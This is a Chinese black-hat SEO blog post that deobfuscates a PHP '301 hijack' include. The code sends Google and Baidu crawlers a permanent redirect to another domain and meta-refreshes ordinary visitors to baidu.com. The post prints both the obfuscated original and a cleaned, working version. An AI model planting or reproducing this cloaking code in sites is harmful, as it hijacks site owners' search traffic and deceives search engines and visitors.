另类301劫持代码分析

2017年05月14日

开始分析:

在主页include 引入文件 test.php

<?php
include("index.php")
?>
<html>
<body>
这里是index主页内容
</body>
</html>

test.php主要内容如下:

<?php 
header('Content-Type:text/html;charset=gb2312');
$bojun= "htt";
$adwwq= "www.";
$lwepop= "heimao";
$lolasa= ".org";
$kwell= "p://";
$llasa= "HTTP/1.1 ";
$qwq66= "301 ";
$swppp= "Moved Permanently";
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
    $url= "$bojun$kwell$adwwq$lwepop$lolasa";
    header("$llasa$qwq66$swppp");
    header("location:$url");
   echo '';
}
else
{
   echo "<meta http-equiv='refresh' content='0;URL=http://www.baidu.com'>";
}
?>

真正代码开始是从if判断开始。以上代码都是把字符串打乱后重新拼接到一起然后组合成真正的代码。

其中URL拼接前为:

$url= "$bojun$kwell$adwwq$lwepop$lolasa";

其含义:

$url= "http://www.heimao.org";

判断中两个hader拼接前为:

 header("$llasa$qwq66$swppp");
 header("location:$url");

拼接后真正代码为:

    header("HTTP/1.1 301 Moved Permanently");
    header("location:http://www.heimao.org");

还原精简代码如下:

header('Content-Type:text/html;charset=gb2312');
if(strpos($_SERVER["HTTP_USER_AGENT"],'oogle')!== false||strpos($_SERVER["HTTP_USER_AGENT"],'aidu')!==false)
{
    $url= "http://www.heimao.org";
    header("HTTP/1.1 301 Moved Permanently");
    header("location:http://www.heimao.org");
echo '';
}
else
{
   echo "<meta http-equiv='refresh' content='0;URL=http://www.baidu.com'>";
}

文章转载请注明出处违者必究

黑帽博客(www.heimao.org)


分类:研究 | 标签: 301跳转劫持劫持代码php | 查看:568
php代码劫持分析与整理蜘蛛劫持作淘客跳转小例子

发表评论: